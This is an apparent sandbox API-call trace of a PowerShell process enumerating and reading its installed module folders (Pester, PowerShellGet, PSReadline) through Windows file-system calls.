	[0048.032] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff
	[0048.032] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff
	[0048.032] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff
	[0048.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38
	[0048.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39
	[0048.032] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7ec0
	[0048.033] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.033] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.033] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0048.033] FindClose (in: hFindFile=0x1505fab7ec0 | out: hFindFile=0x1505fab7ec0) returned 1
	[0048.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38
	[0048.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39
	[0048.033] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7ec0
	[0048.033] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.034] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.034] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0048.034] FindClose (in: hFindFile=0x1505fab7ec0 | out: hFindFile=0x1505fab7ec0) returned 1
	[0048.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0048.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40
	[0048.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41
	[0048.034] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab7f80
	[0048.035] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.035] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.035] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.035] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.035] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.035] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.035] FindNextFileW (in: hFindFile=0x1505fab7f80, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0048.035] FindClose (in: hFindFile=0x1505fab7f80 | out: hFindFile=0x1505fab7f80) returned 1
	[0048.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0048.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0048.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0048.036] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40
	[0048.036] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41
	[0048.036] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab7ce0
	[0048.036] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.036] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.036] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.036] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.037] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.037] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.037] FindNextFileW (in: hFindFile=0x1505fab7ce0, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0048.037] FindClose (in: hFindFile=0x1505fab7ce0 | out: hFindFile=0x1505fab7ce0) returned 1
	[0048.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0048.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0048.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18d6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40
	[0048.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18d710, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40
	[0048.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db50) returned 1
	[0048.037] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x184c18dc30 | out: lpFileInformation=0x184c18dc30*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0048.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18db10) returned 1
	[0048.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db80) returned 1
	[0048.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x184c18d670, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40
	[0048.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41
	[0048.037] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x184c18d820 | out: lpFindFileData=0x184c18d820) returned 0x1505fab7ec0
	[0048.038] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.038] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.038] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.038] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.038] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.074] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 1
	[0048.076] FindNextFileW (in: hFindFile=0x1505fab7ec0, lpFindFileData=0x184c18d870 | out: lpFindFileData=0x184c18d870) returned 0
	[0048.076] FindClose (in: hFindFile=0x1505fab7ec0 | out: hFindFile=0x1505fab7ec0) returned 1
	[0048.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dad0) returned 1
	[0048.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da90) returned 1
	[0048.077] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff
	[0048.077] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff
	[0048.077] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff
	[0048.077] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff
	[0048.078] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff
	[0048.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38
	[0048.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dce0) returned 1
	[0048.078] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x184c18ddc0 | out: lpFileInformation=0x184c18ddc0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
	[0048.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dca0) returned 1
	[0048.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd10) returned 1
	[0048.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x184c18d800, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38
	[0048.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39
	[0048.078] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x184c18d9b0 | out: lpFindFileData=0x184c18d9b0) returned 0x1505fab8280
	[0048.078] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0048.078] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 1
	[0048.079] FindNextFileW (in: hFindFile=0x1505fab8280, lpFindFileData=0x184c18da00 | out: lpFindFileData=0x184c18da00) returned 0
	[0048.079] FindClose (in: hFindFile=0x1505fab8280 | out: hFindFile=0x1505fab8280) returned 1
	[0048.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc60) returned 1
	[0048.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc20) returned 1
	[0048.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x184c18d910, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53
	[0048.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd50) returned 1
	[0048.079] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18de30 | out: lpFileInformation=0x184c18de30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1
	[0048.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd10) returned 1
	[0048.079] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53
	[0048.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18daf0) returned 1
	[0048.079] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x67c
	[0048.079] GetFileType (hFile=0x67c) returned 0x1
	[0048.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da60) returned 1
	[0048.079] GetFileType (hFile=0x67c) returned 0x1
	[0048.080] ReadFile (in: hFile=0x67c, lpBuffer=0x15047450260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047450260*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.081] ReadFile (in: hFile=0x67c, lpBuffer=0x15047450260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047450260*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.081] ReadFile (in: hFile=0x67c, lpBuffer=0x15047450260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047450260*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.081] ReadFile (in: hFile=0x67c, lpBuffer=0x15047450260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047450260*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.082] ReadFile (in: hFile=0x67c, lpBuffer=0x15047450260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047450260*, lpNumberOfBytesRead=0x184c18dbc8*=0x1000, lpOverlapped=0x0) returned 1
	[0048.082] ReadFile (in: hFile=0x67c, lpBuffer=0x15047450260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047450260*, lpNumberOfBytesRead=0x184c18dbc8*=0xac4, lpOverlapped=0x0) returned 1
	[0048.082] ReadFile (in: hFile=0x67c, lpBuffer=0x1504744f864, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x1504744f864*, lpNumberOfBytesRead=0x184c18dbc8*=0x0, lpOverlapped=0x0) returned 1
	[0048.082] ReadFile (in: hFile=0x67c, lpBuffer=0x15047450260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbc8, lpOverlapped=0x0 | out: lpBuffer=0x15047450260*, lpNumberOfBytesRead=0x184c18dbc8*=0x0, lpOverlapped=0x0) returned 1
	[0048.082] CloseHandle (hObject=0x67c) returned 1
	[0048.084] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff
	[0048.084] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff
	[0048.084] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff
	[0048.084] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff
	[0048.084] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff
	[0048.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.084] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35
	[0048.084] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36
	[0048.084] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7920
	[0048.084] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.085] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.085] FindNextFileW (in: hFindFile=0x1505fab7920, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0048.085] FindClose (in: hFindFile=0x1505fab7920 | out: hFindFile=0x1505fab7920) returned 1
	[0048.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcb0) returned 1
	[0048.085] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x184c18d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35
	[0048.085] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x184c18d740, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36
	[0048.085] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x184c18d950 | out: lpFindFileData=0x184c18d950) returned 0x1505fab7740
	[0048.085] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.085] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 1
	[0048.086] FindNextFileW (in: hFindFile=0x1505fab7740, lpFindFileData=0x184c18d9a0 | out: lpFindFileData=0x184c18d9a0) returned 0
	[0048.086] FindClose (in: hFindFile=0x1505fab7740 | out: hFindFile=0x1505fab7740) returned 1
	[0048.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc00) returned 1
	[0048.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dbc0) returned 1
	[0048.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0048.086] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39
	[0048.086] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", lpFilePart=0x0) returned 0x3a
	[0048.086] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\*", lpFindFileData=0x184c18d7c0 | out: lpFindFileData=0x184c18d7c0) returned 0x1505fab8100
	[0048.086] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.086] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.086] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.087] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.087] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 1
	[0048.087] FindNextFileW (in: hFindFile=0x1505fab8100, lpFindFileData=0x184c18d810 | out: lpFindFileData=0x184c18d810) returned 0
	[0048.087] FindClose (in: hFindFile=0x1505fab8100 | out: hFindFile=0x1505fab8100) returned 1
	[0048.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da70) returned 1
	[0048.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18da30) returned 1
	[0048.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18db20) returned 1
	[0048.087] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", nBufferLength=0x105, lpBuffer=0x184c18d610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1", lpFilePart=0x0) returned 0x39
	[0048.087] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", nBufferLength=0x105, lpBuffer=0x184c18d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\", lpFilePart=0x0) returned 0x3a
